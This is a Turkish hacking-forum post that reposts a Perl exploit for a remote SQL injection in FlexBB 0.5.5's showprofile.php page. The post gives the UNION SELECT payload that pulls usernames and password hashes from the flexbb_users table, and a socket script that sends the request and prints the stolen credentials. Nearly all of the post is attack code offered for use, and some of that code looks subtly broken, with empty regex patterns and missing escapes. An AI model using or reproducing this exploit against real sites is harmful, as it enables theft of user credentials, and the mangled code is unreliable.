PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 FlexBB = 0.5.5 SQL

Aşağa gitmek 
YazarMesaj
H@CKER
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 468
Şehir : www.hackturkiye.ile.biz
Meslek : H@CKER\'LİK
Kayıt tarihi : 12/08/07

MesajKonu: FlexBB = 0.5.5 SQL   Ptsi Ağus. 20, 2007 2:41 pm

#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
# 1- First Do Login
# 2- View This Link Very Happy
#
# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
# Div The PHP Security Fucking Tool Very Happy

##-- Start --#

$host = "127.0.0.1";
$path = "/flexbb/";
$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";

##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# FlexBB Dir On Server | exm. /flexbb/
#
# $mycookie :-
# Your Login Info To Forum * Not The Real Password || The Hashed One *


$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Was Filed");

##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1n";
$evildata .= "Host: $host n";
$evildata .= "Accept: */* n";
$evildata .= "Keep-Alive: 300n";
$evildata .= "Connection: keep-alive nn";

print $sock $evildata;

while($ans = <$sock>){
$usr_newans = $ans;
$pwd_newans = $ans;
#print $newans;
$usr_newans =~ m// && print "[+] Username is :- ".$1."n";
$pwd_newans =~ m/(.*?)/ && print "[+] Password is :- ".$1."n";
}

# milw0rm.com
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
FlexBB = 0.5.5 SQL
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: